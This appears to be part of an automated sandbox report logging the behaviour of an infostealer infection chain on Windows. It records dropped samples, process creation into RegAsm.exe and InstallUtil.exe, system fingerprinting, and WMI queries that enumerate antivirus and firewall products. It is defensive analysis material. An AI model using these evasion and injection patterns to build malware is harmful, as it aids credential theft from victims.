Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe "C:\Users\user\AppData\Roaming\esFzLrEqPw.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe "C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: penis.exe, 00000019.00000002.2964689421.00000000030EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: GetProgmanWindow
Source: axplong.exe, axplong.exe, 00000006.00000002.3515196648.0000000000405000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: <~y[Program Manager
Source: penis.exe, 00000019.00000002.2964689421.00000000030EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SetProgmanWindow
Source: file.exe, 00000000.00000002.2227763808.0000000000D55000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2262996473.0000000000405000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2276480670.0000000000405000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: o<~y[Program Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0021D312 cpuid 6_2_0021D312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 15_2_0041E825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 15_2_00414138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 15_2_0041EA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_0041EBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 15_2_0041E412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 15_2_0041ECA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 15_2_0041ED76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 15_2_0041465E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW, 15_2_0041E60D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 15_2_0041E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 15_2_0041E6B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW, 15_2_0041E79A
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000355001\3ab68b6f1f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000357001\Microsoft-Edge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0021CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_0021CB1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: gold.exe, 00000008.00000002.2764168671.00000000011F6000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 0000001C.00000002.2991813058.0000000000B65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252257395.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252600342.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, gold.exe, 00000008.00000002.2764168671.00000000011F6000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 0000001C.00000002.2991813058.0000000000B65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVP.exe
Source: RegAsm.exe, 0000001F.00000002.3421831701.000000000779E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3303759559.0000000005EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
